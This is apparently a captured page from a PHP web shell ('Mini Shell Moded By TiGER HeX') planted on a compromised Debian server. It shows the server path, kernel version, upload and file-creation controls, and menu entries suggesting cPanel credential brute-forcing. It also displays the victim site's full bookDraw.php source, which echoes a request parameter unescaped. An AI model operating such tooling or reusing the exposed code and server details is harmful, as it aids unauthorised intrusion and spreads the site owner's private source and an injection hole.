Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
mnt
/
volume_sfo2_01
/
50mmla
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
/mnt/volume_sfo2_01/50mmla/bookDraw.php
<?php include_once('includes/static/configure.php'); include_once('includes/static/util.php'); include_once('includes/static/dbcon.php'); include_once('includes/static/gdimg.php'); include_once('includes/static/sessions.php'); include_once('includes/appTop.php'); if(!is_authorized()){ header("Location: login.php?refurl=".urlencode($_SERVER['REQUEST_URI'])); exit(); } if(is_banned()){ header("Location: banned.php"); exit(); } //set page number so that shockwave can access it if(!isset($_REQUEST['pageNum'])){die("no page num set");} $_SESSION['page_num'] = $_REQUEST['pageNum']; $uid = $_SESSION['user_id']; $pnum = $_SESSION['page_num']; $pg_name = basename($_SERVER['PHP_SELF']); include_once('includes/header.php'); $prev_num = $_REQUEST['pageNum']-1; $next_num = $_REQUEST['pageNum']+1; if($prev_num >= 1 ){ $previous_url = $_SERVER['PHP_SELF']."?userId=$uid&pageNum=$prev_num"; $previous = "<a href=\"$previous_url\"><img src=\"images/previous.gif\" border=\"0\"></a>"; }else{ $previous = ""; } if($next_num <= BOOK_IMGS){ $next_url = $_SERVER['PHP_SELF']."?userId=$uid&pageNum=$next_num"; $next = "<a href=\"$next_url\"><img src=\"images/next.gif\" border=\"0\"></a>"; }else{ $next = ""; } ?> <table border="0" cellspacing="10" cellpadding="0" align="center"> <tr> <td align="center" valign="top" width="17"><?echo $previous?></td> <td align="center" valign="top" width="17"><a href="bookContributions.php?userId=<?echo $uid?>"><img src="images/home.gif" border="0"></a></td> <td align="center" valign="top" width="17"><?echo $next?></td> </tr> </table> Page <?echo $_REQUEST['pageNum']?> <div align="center"> <object classid="clsid:166B1BCA-3F9C-11CF-8075-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version=8,5,1,0" ID=paint width=700 height=560> <param name=src value="paint3.dcr"> <param name=swRemote value="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' "> <param name=swStretchStyle value=none> <PARAM NAME=bgColor VALUE=#FFFFFF> <embed src="paint3.dcr" bgColor=#FFFFFF width=700 height=560 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=none type="application/x-director" pluginspage="http://www.macromedia.com/shockwave/download/"></embed> </object> </div> <? include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>